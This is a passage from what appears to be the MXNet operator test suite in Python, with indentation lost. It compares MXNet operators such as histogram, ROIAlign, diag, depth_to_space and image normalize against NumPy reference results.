b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
